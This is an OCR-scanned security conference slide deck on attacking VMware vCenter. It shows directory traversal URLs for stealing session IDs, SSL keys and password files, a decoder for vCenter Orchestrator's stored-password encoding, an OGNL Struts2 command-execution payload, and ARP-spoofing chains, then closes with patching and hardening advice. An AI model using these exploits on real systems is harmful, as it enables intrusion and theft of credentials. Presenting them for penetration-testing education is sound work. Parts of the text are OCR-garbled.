(

J ER

Scan

Security Scanner for SAP

Invest in security

to secure investments

How to hack VMware
vCenter server in 60
seconds

Alexander Minozhenko

^ ERPScan

Security Scanner for SAP

Pen-tester at Digital Security

Researcher

DEFCON RUSSIA

DCG#7812 / Zeronights

DCG * 7312

CTF

Thanks for ideas and support to Alexey Sintsov

^ ERPScan

Security Scanner for SAP

What do pen-testers do?

Scanning
Fingerprinting
Banner grabbing
Play with passwords

Find vulns.
Exploit vulns.

Escalate privs.
Dig in

Find ways to make attacks
And e.t.c.

} ERPScan

Security Scanner for SAP

Static

— Source code review

• regexp

• formal methods

• hand testing

— Reverse Engineering

• formal methods

• hands...

Dynamic

— Fuzzing (bin/web)

+ Typical bugs for class
+ Reverse Engineering

— Hand testing

Architecture Analysis (Logic flaws)
Use vuln. Database (CVE/exploit-

^ ERPScan

Security Scanner for SAP

Tasks:

pwn target 8)
show most dang, vulns.
show real attacks and what an attacker can do

Time:

Not much )
Ta rgets :

Large number of targets, different types

- Fuzzing (bin/web)

[ + T ypical bugs for class I

+ Reverse Engineering
- Hana testing 1

Architecture Analysis (Logic flaws)

Use vuln. Database (CVE/exploit-db/etc

Workstation Workstation Workstation

^ ERPScan

Security Scanner for SAP

VMware vCenter Server

VMware vCenter Server is solution to manag
VMware vSphere

vSphere - virtualization operating system

Manage

VM

VM

VM

VM

VM

VM

VM

VM

VM

VM

VM

VM

VMware vSphere

VMware vSphere

VMware vSphere

_J

} ERPScan

Security Scanner for SAP

Vmware vCenter versi
Services:

— Update Manager

— vCenter Orchestrator

— Chargeback

— Other

Each services has web

>n 4.1 update 1

VMware

vCenter Server

Automation

Unlocks the power of
VMware vSphere
through proactive
management

Scalability

Scalable and enten-ilble
nruiugesnem platform

""^HJ-*

Visibility

Deep visibility Into
every level of the
virtual infrastructure

server

} ERPScan

Security Scanner for SAP

CVE-2009-1523

Directory traversal in Jetty web server

http://target:9084/vci/download/health.xml/%3f/../../../../FILE

Discovered by Claudio Criscione

But Fixed in VMware Update Manager 4.1 update 1 :(

} ERPScan

Security Scanner for SAP

• Directory traversal in Jetty web server

• http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%
5C..%5C..%5C..\FILE.EXT

• Discovered by Alexey Sintsov

• Metasploit module vmware_update_manager_traversal.rb by

sinn3r

^ ERPScan

Security Scanner for SAP

Directory traversa

What file to read?

Claudio Criscione propose to read vpxd-profiler-* -

/SessionStats/SessionPool/Session/ld='06B90BCB-A0A4-4B9C-B680-
FB72656AlDCB7Username=,,FakeDomain\FakeUser7SoapSession/ld
D45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1

='A

• Contains logs of SOAP requests with session ID

} ERPScan

Security Scanner for SAP

• "VASTO - collection of Metasploit modules
meant to be used as a testing tool to perform
penetration tests or security audit of
virtualization solutions."
http://vasto.nibblesec.org/

• vmware_updatemanager_traversal.rb
Jetty path traversal

• vmware_session_rider.rb

Local proxy to ride stolen SOAPID sessions

^ ERPScan

Security Scanner for SAP

Fixed in version 4.1 update 1,
contain ip - addresses

&bwj] npaBKa Bma XypHaji 3aK/ia^KH MHcrpyMeHTbi Cnpaeita

9 : o X & (

http:/.

084/vc i/d own load s/.\. .\. .\. .\. .\. .\. .\. .\P ro g ra rn D ata\VM wa re\VM wa re Vi rtu a I C enter\Lo g s\.vpxd - p rof i I er-6

P CaMbie nony^napHbie HanajibHaji CTpaHHu,a /leHTa HOBOCTew

»

■ http:/;

m

mm-

^..d - prof i I er-6.log X

Error 404 - Not Found

x

Section for VMware VirtualCenter, pid=3564, version=4 . 1 . f build=build-345043 f option=Releese
[2011-^-0 12:33:20.558 00560 info 'App']
<p ul 1 Count e r s >

/Alarir.Stats/Notif i cations Fending/ Count/total

/DbStats/Fool/Cnx/InUse/total 1

/DbStats/Pool/Cnx/RetryCount /total

/DbStats/Paal/Cnx/Size/tatal 10

/ DbS tat s /Pool/Tm/CoiriQit Count/ total 5 6

/DbStats/Pool/Txn/ReplsyCount/total

/DbStats/Paal/Txn/RallbackCaunt/ total

/ Db Stats/Fool /Txn/ S tint Count /tot al 555

/EventStats/PendingE vents /Count/ total 2

/Inventor yStats/ManagedEntityStats/Clusters/total 2

^ ERPScan

Security Scanner for SAP

Make arp poisoning attack
Spoof ssl certificate

^ ERPScan

Security Scanner for SAP

Administrators check SSL cert

Se cy rity Wa rn in g

|— Certificate Warnings

An untrusted SSL certificate is installed on r, A'in-9iipbe5q5br r and secure communication cannot be
guaranteed. Depending on your security policy r this issue might not represent a security concern
You may need to install a trusted SSL certificate on your server to prevent this warning from
appearing.

Click Ignore to continue using the current SSL certificate

View Certificate

Ignore

Cancel

I - Install this certificate and do notdisplay any security warnings for'\win-9iipbe5q5br".

} ERPScan

Security Scanner for SAP

• Steal ssl key via directory traversal

http://target:9084/vci/downloads/.\.A-.\.A-.\.A-.\.ADocuments and SettingsXAII
Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key

• Make arp-spoofing

• Decrypt traffic with stolen ssl key

• What if arp-spoofing does not work?

^ ERPScan

Security Scanner for SAP

Vmware vCenter Orchestrator

Vmwa re vCO - software for automate
configuration and management

nstall by default with vCenter

• Have interesting file

C:\Program files\VMware\lnfrastructure\Orchestrator
\configuration\ietty\etc\passwd. properties

^ ERPScan

Security Scanner for SAP

Vmware vCenter Orchestrator

Which contains md5 password without salt
Could easy bruteforce using rainbow tables

Ky dookie@inbotfu: Re yo... [j http;//defcon-njs5E3.ru/d,..

1010,4.30i9084/vci/down... ■ \ Q

f CO

:9034/vci/downloads/,%5C..%5C..%5C%5C.%5C.%5C.%5C..%5CPfogr3nn%

} ERPScan

Security Scanner for SAP

VMware vCenter Orchestrator Configuration

General

-T- Network

^fc LDAP

Database

4

Server Certificate

A

Licenses

A

1 4

Startup Options

[ ^ Troubleshooting

Plug-ins

^/^Mail (l.l.O)

ifi^, SSH (1.0.2)

r*

J^J vCenter 4.0 (4.0.0)

L A

VMware Virtual Infrastructure

Available:

Host:

Port:

Path:

User name :

Password :

User name :

Password :

Enabled

n ew- virtu a l-center-h a st

142

ju Secure channel

/sdk

Specify the user credential for the admir

vmware

Specify which strategy will be used for it
Share a unique session : Se

v ; - - iciiucinig Lciiijjia lc , / m_u - 1111 f uagc^; piug.ii n piugn i . j 3|j ~~>

i<div id="c_ct>ntent">

▼ •{form narie5pace='7ccinfig^plugin ir id=' r PluginSaue ir name= ir Plugin5ave ir o n submit = "return

tfalidateFom_Plugin5ave() ; Ir action='7config^plLgin/PluginSave .action 11 method="P05T ir >
Kp>„.{/p>

^ <diif id= ir wwgrp_Plugin5ave_ir5tallJ5ername' r class ="wwgrp "">„.■; /div>

T <div id= l! vfffErp_PluginSave_installPa5sword" class ="ww , erp ,B >
► <div id= IB wwlbl_PluginSa^e_iri5tallPa55tford ir cla55= ,r mdbr>...Vdiv>

<br>

W<div id= ir wwctrl_Plugin5a\/e_in5tallPa55word ir cla55= ira wwftifc^

i input type= ir password ,r name= "installPassword " val^ ,F Password&l/^d= ,, PluginSave_installPassword ,l >

^ ERPScan

Security Scanner for SAP

Vmware vCenter Orchestrator

• vCO stored password at files:

• C:\Program
Files\VMware\lnfrastructure\Orchestrator\app-
server\server\vmo\conf\plugins\VC.xml

• C:\Program
Files\VMware\lnfrastructure\Orchestrator\app-
server\server\vmo\conf\vmo. properties

} ERPScan

Security Scanner for SAP

<?xml version= ,, 1.0" encoding= ,, UTF-8" standalone="yes ,, ?>
<virtual-infrastructure-hosts>
<virtual-infrastructure-host
<enabled>true</enabled>

<url>https://new-virtual-center-host:443/sdk</url>

<administrator-username>vmware</administrator-
username>

odministrator-
password>010506275767b74786b383a4a60be76786474032
9d5fcf324ec7fc98ble0aaeef </administrator-password>

<pattern>%u</pattern>

</virtual-infrastructure-host>

</virtual-infrastructure-hosts>

} ERPScan

Security Scanner for SAP

Password Encoding

006766e7964766al51e213a242665123568256c4031702d4c78454e5b575f60654b
vmware

00776646771786a783922145215445b62322dla2b5d6el96a6a712d712e24726079
vcenter

Red bytes look like length
Green bytes in ASCII range
Black bytes random

^ ERPScan

Security Scanner for SAP

Algorithm password Encoding

1 for (int i 0; i nbDigits; i ) {

2 | int value = 0;

3 | | if (i < pwd.lengthQ) {

4 I value pwd.charAt(i);

5 // Take i th password symbol

6 | 1 }

7 I else

8 ! I {

9 ! value = Math.abs(rnd.nextlnt() % 100);

10 I // Take random byte

11 | | }

12 | String to Add = Integer. toHexString(value i);

13 I // i th password symbol position of symbol

14 result . append (toAdd);

15

1 len

= (pass[0. .2]) ,to_i

2 enc_

_pass = pass[3. . -1] ,scan(/.{2}/)

3 dec_

_pass = (0. . .len) .collect do |i|

4 |

byte = enc_pass[i] ,to_i(16)

5 |

byte -= i

7 end

byte.chr

^ ERPScan

Security Scanner for SAP

VMware vCenter Orchestrator use Struts2
version 2.11 discovered by Digital Defense, Inc

CVE-2010-1870 Struts2/XWork remote
command execution discovered by Meder
Kydyraliev

Fixed in 4.2

} ERPScan

Security Scanner for SAP

#memberAccess[ 'allowStaticMethodAccess ' ] = true

#foo = new java . tang , Boolean ( "false" )

#context[ 'xwork.MethodAccessor.denyMethodExecution r ] = #foo

#rt = ^jQva , long Rmtim%QtMtim()

#rt.exec('calc exe J )

} ERPScan

Security Scanner for SAP

Attack Vectors

Directory traversal + ARP poisoning

Directory traversal + password
decoding/bruteforcing

Remote code execution using Struts2 bug

^ ERPScan

Security Scanner for SAP

Update to latest version 4.2 update 4 or 5
Filter administration service services

VMware KB 2021259.

VMware vSphere Security Hardering Guide

} ERPScan

Security Scanner for SAP

Conclusions

Password must be stored in hash with salt
encrypted

Fixed bugs not always fixed in proper way

Pen-tester will get more profit if he tries to
research something

One simple bug and we can own all
infrastructure

ERPScan

Security Scanner for SAP

a.minozhenko@dsec.ru
@a!3xmin